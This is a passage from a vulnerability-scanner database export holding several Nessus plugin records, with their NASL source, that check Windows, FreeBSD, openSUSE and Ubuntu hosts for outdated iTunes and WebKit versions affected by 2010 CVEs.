value:\"Upgrade to Apple iTunes 9.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type != 'Windows') audit(AUDIT_OS_NOT, \"Windows\");\n\nfixed_version = \"9.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:19:06", "description": "The version of Apple iTunes installed on the remote Windows host is\nolder than 9.2. As such, it may be affected by multiple\nvulnerabilities :\n\n - A heap-based buffer overflow in the handling of images\n with an embedded ColorSync profile may lead to an\n application crash or arbitrary code execution.\n (CVE-2009-1726)\n\n - Multiple integer overflows in ImageIO's handling of\n TIFF files may lead to an application crash or\n arbitrary code execution. (CVE-2010-1411)\n\n - Multiple vulnerabilities WebKit may have a variety of\n effects, including arbitrary code execution.\n (CVE-2010-0544, CVE-2010-1119, CVE-2010-1387,\n CVE-2010-1390, CVE-2010-1392, CVE-2010-1393,\n CVE-2010-1395, CVE-2010-1396, CVE-2010-1397,\n CVE-2010-1398, CVE-2010-1399, CVE-2010-1400,\n CVE-2010-1401, CVE-2010-1402, CVE-2010-1403,\n CVE-2010-1404, CVE-2010-1405, CVE-2010-1408,\n CVE-2010-1409, CVE-2010-1410, CVE-2010-1412,\n CVE-2010-1414, CVE-2010-1415, CVE-2010-1416,\n CVE-2010-1417, CVE-2010-1418, CVE-2010-1419,\n CVE-2010-1421, CVE-2010-1422, CVE-2010-1749,\n CVE-2010-1758, CVE-2010-1759, CVE-2010-1761,\n CVE-2010-1763, CVE-2010-1769, CVE-2010-1770,\n CVE-2010-1771, CVE-2010-1774)", "edition": 27, "published": "2010-06-17T00:00:00", "title": "Apple iTunes < 9.2 Multiple Vulnerabilities (credentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0544", "CVE-2010-1412", "CVE-2010-1397", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-1409", "CVE-2010-1749", "CVE-2010-1758", "CVE-2010-1771", "CVE-2010-1410", "CVE-2010-1415", "CVE-2010-1769", "CVE-2010-1419", "CVE-2010-1763", "CVE-2010-1387", "CVE-2010-1759", "CVE-2009-1726", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-1418", "CVE-2010-1119", "CVE-2010-1398", "CVE-2010-1401", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1393", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1411", "CVE-2010-1402", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1399"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_9_2.NASL", "href": "https://www.tenable.com/plugins/nessus/47037", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(47037);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\n \"CVE-2009-1726\",\n \"CVE-2010-0544\",\n \"CVE-2010-1119\",\n \"CVE-2010-1387\",\n \"CVE-2010-1390\",\n \"CVE-2010-1392\",\n \"CVE-2010-1393\",\n \"CVE-2010-1395\",\n \"CVE-2010-1396\",\n \"CVE-2010-1397\",\n \"CVE-2010-1398\",\n \"CVE-2010-1399\",\n \"CVE-2010-1400\",\n \"CVE-2010-1401\",\n \"CVE-2010-1402\",\n \"CVE-2010-1403\",\n \"CVE-2010-1404\",\n \"CVE-2010-1405\",\n \"CVE-2010-1408\",\n \"CVE-2010-1409\",\n \"CVE-2010-1410\",\n \"CVE-2010-1411\",\n \"CVE-2010-1412\",\n \"CVE-2010-1414\",\n \"CVE-2010-1415\",\n \"CVE-2010-1416\",\n \"CVE-2010-1417\",\n \"CVE-2010-1418\",\n \"CVE-2010-1419\",\n \"CVE-2010-1421\",\n \"CVE-2010-1422\",\n \"CVE-2010-1749\",\n \"CVE-2010-1758\",\n \"CVE-2010-1759\",\n \"CVE-2010-1761\",\n \"CVE-2010-1763\",\n \"CVE-2010-1769\",\n \"CVE-2010-1770\",\n \"CVE-2010-1771\",\n \"CVE-2010-1774\"\n );\n script_bugtraq_id(40657, 40663, 40697, 40710, 41053, 41054, 41125);\n\n script_name(english:\"Apple iTunes < 9.2 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks version of iTunes on Windows\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host contains an application that is affected by multiple\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Apple iTunes installed on the remote Windows host is\nolder than 9.2. As such, it may be affected by multiple\nvulnerabilities :\n\n - A heap-based buffer overflow in the handling of images\n with an embedded ColorSync profile may lead to an\n application crash or arbitrary code execution.\n (CVE-2009-1726)\n\n - Multiple integer overflows in ImageIO's handling of\n TIFF files may lead to an application crash or\n arbitrary code execution. (CVE-2010-1411)\n\n - Multiple vulnerabilities WebKit may have a variety of\n effects, including arbitrary code execution.\n (CVE-2010-0544, CVE-2010-1119, CVE-2010-1387,\n CVE-2010-1390, CVE-2010-1392, CVE-2010-1393,\n CVE-2010-1395, CVE-2010-1396, CVE-2010-1397,\n CVE-2010-1398, CVE-2010-1399, CVE-2010-1400,\n CVE-2010-1401, CVE-2010-1402, CVE-2010-1403,\n CVE-2010-1404, CVE-2010-1405, CVE-2010-1408,\n CVE-2010-1409, CVE-2010-1410, CVE-2010-1412,\n CVE-2010-1414, CVE-2010-1415, CVE-2010-1416,\n CVE-2010-1417, CVE-2010-1418, CVE-2010-1419,\n CVE-2010-1421, CVE-2010-1422, CVE-2010-1749,\n CVE-2010-1758, CVE-2010-1759, CVE-2010-1761,\n CVE-2010-1763, CVE-2010-1769, CVE-2010-1770,\n CVE-2010-1771, CVE-2010-1774)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT4220\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.apple.com/archives/security-announce/2010/Jun/msg00002.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apple iTunes 9.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"SMB/iTunes/Version\");\n\n exit(0);\n}\n\n\ninclude (\"global_settings.inc\");\n\n\nversion = get_kb_item(\"SMB/iTunes/Version\");\nif (isnull(version)) exit(1, \"The 'SMB/iTunes/Version' KB item is missing.\");\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n ver[0] < 9 ||\n (\n ver[0] == 9 &&\n (\n ver[1] < 2 ||\n (ver[1] == 2 && ver[2] == 0 && ver[3] < 61)\n )\n )\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n 'iTunes ' + version + ' is installed on the remote host.\\n';\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, \"The host is not affected since iTunes \"+version+\" is installed.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:40:09", "description": "Gustavo Noronha reports :\n\nDebian's Michael Gilbert has done a great job going through all CVEs\nreleased about WebKit, and including patches in the Debian package.\n1.2.3 includes all of the commits from trunk to fix those, too.", "edition": 27, "published": "2010-07-19T00:00:00", "title": "FreeBSD : webkit-gtk2 -- Multiple vulnerabilities (19419b3b-92bd-11df-b140-0015f2db7bde)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1760", "CVE-2010-1758", "CVE-2010-1771", "CVE-2010-1407", "CVE-2010-1772", "CVE-2010-1664", "CVE-2010-1759", "CVE-2010-1773", "CVE-2010-1774", "CVE-2010-2264", "CVE-2010-1418", "CVE-2010-1761", "CVE-2010-1665", "CVE-2010-1422", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1762", "CVE-2010-1386", "CVE-2010-1405", "CVE-2010-1421"], "modified": "2010-07-19T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:webkit-gtk2", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_19419B3B92BD11DFB1400015F2DB7BDE.NASL", "href": "https://www.tenable.com/plugins/nessus/47751", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47751);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-1386\", \"CVE-2010-1392\", \"CVE-2010-1405\", \"CVE-2010-1407\", \"CVE-2010-1416\", \"CVE-2010-1417\", \"CVE-2010-1418\", \"CVE-2010-1421\", \"CVE-2010-1422\", \"CVE-2010-1664\", \"CVE-2010-1665\", \"CVE-2010-1758\", \"CVE-2010-1759\", \"CVE-2010-1760\", \"CVE-2010-1761\", \"CVE-2010-1762\", \"CVE-2010-1767\", \"CVE-2010-1770\", \"CVE-2010-1771\", \"CVE-2010-1772\", \"CVE-2010-1773\", \"CVE-2010-1774\", \"CVE-2010-2264\");\n\n script_name(english:\"FreeBSD : webkit-gtk2 -- Multiple vulnerabilities (19419b3b-92bd-11df-b140-0015f2db7bde)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Gustavo Noronha reports :\n\nDebian's Michael Gilbert has done a great job going through all CVEs\nreleased about WebKit, and including patches in the Debian package.\n1.2.3 includes all of the commits from trunk to fix those, too.\"\n );\n # http://blog.kov.eti.br/?p=116\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blog.kov.eti.br/2010/07/webkitgtk-122-and-123-released/\"\n );\n # https://vuxml.freebsd.org/freebsd/19419b3b-92bd-11df-b140-0015f2db7bde.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a10ad78b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webkit-gtk2<1.2.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:07:44", "description": "The libwebkit browser engine version 1.2.3 fixes several security\nrelevant bugs\n\n(CVE-2010-1386, CVE-2010-1392, CVE-2010-1405, CVE-2010-1407,\nCVE-2010-1416, CVE-2010-1417, CVE-2010-1665, CVE-2010-1418,\nCVE-2010-1421, CVE-2010-1422, CVE-2010-1501, CVE-2010-1767,\nCVE-2010-1664, CVE-2010-1758, CVE-2010-1759, CVE-2010-1760,\nCVE-2010-1761, CVE-2010-1762, CVE-2010-1770, CVE-2010-1771,\nCVE-2010-1772, CVE-2010-1773, CVE-2010-1774)", "edition": 25, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : libwebkit (openSUSE-SU-2010:0458-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1760", "CVE-2010-1758", "CVE-2010-1771", "CVE-2010-1407", "CVE-2010-1772", "CVE-2010-1664", "CVE-2010-1759", "CVE-2010-1773", "CVE-2010-1501", "CVE-2010-1774", "CVE-2010-1418", "CVE-2010-1761", "CVE-2010-1665", "CVE-2010-1422", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1762", "CVE-2010-1386", "CVE-2010-1405", "CVE-2010-1421"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libwebkit-lang", "p-cpe:/a:novell:opensuse:libwebkit-devel", "p-cpe:/a:novell:opensuse:libwebkit-1_0-2", "cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:webkit-jsc", "p-cpe:/a:novell:opensuse:libwebkit-1_0-2-32bit"], "id": "SUSE_11_3_LIBWEBKIT-100723.NASL", "href": "https://www.tenable.com/plugins/nessus/75627", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libwebkit-2806.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75627);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1386\", \"CVE-2010-1392\", \"CVE-2010-1405\", \"CVE-2010-1407\", \"CVE-2010-1416\", \"CVE-2010-1417\", \"CVE-2010-1418\", \"CVE-2010-1421\", \"CVE-2010-1422\", \"CVE-2010-1664\", \"CVE-2010-1665\", \"CVE-2010-1758\", \"CVE-2010-1759\", \"CVE-2010-1760\", \"CVE-2010-1761\", \"CVE-2010-1762\", \"CVE-2010-1767\", \"CVE-2010-1770\", \"CVE-2010-1771\", \"CVE-2010-1772\", \"CVE-2010-1773\", \"CVE-2010-1774\");\n\n script_name(english:\"openSUSE Security Update : libwebkit (openSUSE-SU-2010:0458-1)\");\n script_summary(english:\"Check for the libwebkit-2806 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The libwebkit browser engine version 1.2.3 fixes several security\nrelevant bugs\n\n(CVE-2010-1386, CVE-2010-1392, CVE-2010-1405, CVE-2010-1407,\nCVE-2010-1416, CVE-2010-1417, CVE-2010-1665, CVE-2010-1418,\nCVE-2010-1421, CVE-2010-1422, CVE-2010-1501, CVE-2010-1767,\nCVE-2010-1664, CVE-2010-1758, CVE-2010-1759, CVE-2010-1760,\nCVE-2010-1761, CVE-2010-1762, CVE-2010-1770, CVE-2010-1771,\nCVE-2010-1772, CVE-2010-1773, CVE-2010-1774)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=622994\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-08/msg00004.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libwebkit packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit-1_0-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit-1_0-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libwebkit-1_0-2-1.2.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libwebkit-devel-1.2.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libwebkit-lang-1.2.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"webkit-jsc-1.2.3-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"libwebkit-1_0-2-32bit-1.2.3-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libwebkit-1_0-2 / libwebkit-1_0-2-32bit / libwebkit-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:34:02", "description": "A large number of security issues were discovered in the WebKit\nbrowser and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nPlease consult the bug listed at the top of this advisory to get the\nexact list of CVE numbers fixed for each release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2010-10-20T00:00:00", "title": "Ubuntu 9.10 / 10.04 LTS / 10.10 : webkit vulnerabilities (USN-1006-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0049", "CVE-2010-0052", "CVE-2010-1412", "CVE-2010-1397", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-3257", "CVE-2010-1409", "CVE-2010-0046", "CVE-2010-0651", "CVE-2010-1760", "CVE-2010-0054", "CVE-2010-1783", "CVE-2009-2841", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2009-2797", "CVE-2010-1410", "CVE-2010-1807", "CVE-2010-3116", "CVE-2010-0048", "CVE-2010-3113", "CVE-2010-1415", "CVE-2010-1419", "CVE-2010-1407", "CVE-2010-1780", "CVE-2010-1766", "CVE-2010-1772", "CVE-2010-1389", "CVE-2010-1391", "CVE-2010-1664", "CVE-2010-1387", "CVE-2010-1759", "CVE-2010-2647", "CVE-2010-0650", "CVE-2010-1786", "CVE-2010-1773", "CVE-2010-1785", "CVE-2010-2648", "CVE-2010-3114", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-2264", "CVE-2010-0314", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-1398", "CVE-2010-1790", "CVE-2010-1401", "CVE-2010-1788", "CVE-2010-1781", "CVE-2010-1815", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1814", "CVE-2010-1665", "CVE-2010-3115", "CVE-2010-1792", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1767", "CVE-2010-3259", "CVE-2010-0656", "CVE-2010-1812", "CVE-2010-1393", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-0647", "CVE-2010-1784", "CVE-2010-0053", "CVE-2010-0047", "CVE-2010-0051", "CVE-2010-1402", "CVE-2010-3248", "CVE-2010-1762", "CVE-2010-0050", "CVE-2010-1386", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1394", "CVE-2010-1793"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:webkit", "p-cpe:/a:canonical:ubuntu_linux:libwebkit-1.0-2", "p-cpe:/a:canonical:ubuntu_linux:gir1.0-webkit-1.0", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libwebkit-dev", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/o:canonical:ubuntu_linux:9.10", "p-cpe:/a:canonical:ubuntu_linux:libwebkit-1.0-common", "p-cpe:/a:canonical:ubuntu_linux:libwebkit-1.0-2-dbg"], "id": "UBUNTU_USN-1006-1.NASL", "href": "https://www.tenable.com/plugins/nessus/50046", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1006-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50046);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/09/19 12:54:26\");\n\n script_cve_id(\"CVE-2009-2797\", \"CVE-2009-2841\", \"CVE-2010-0046\", \"CVE-2010-0047\", \"CVE-2010-0048\", \"CVE-2010-0049\", \"CVE-2010-0050\", \"CVE-2010-0051\", \"CVE-2010-0052\", \"CVE-2010-0053\", \"CVE-2010-0054\", \"CVE-2010-0314\", \"CVE-2010-0647\", \"CVE-2010-0650\", \"CVE-2010-0651\", \"CVE-2010-0656\", \"CVE-2010-1386\", \"CVE-2010-1387\", \"CVE-2010-1389\", \"CVE-2010-1390\", \"CVE-2010-1391\", \"CVE-2010-1392\", \"CVE-2010-1393\", \"CVE-2010-1394\", \"CVE-2010-1395\", \"CVE-2010-1396\", \"CVE-2010-1397\", \"CVE-2010-1398\", \"CVE-2010-1400\", \"CVE-2010-1401\", \"CVE-2010-1402\", \"CVE-2010-1403\", \"CVE-2010-1404\", \"CVE-2010-1405\", \"CVE-2010-1406\", 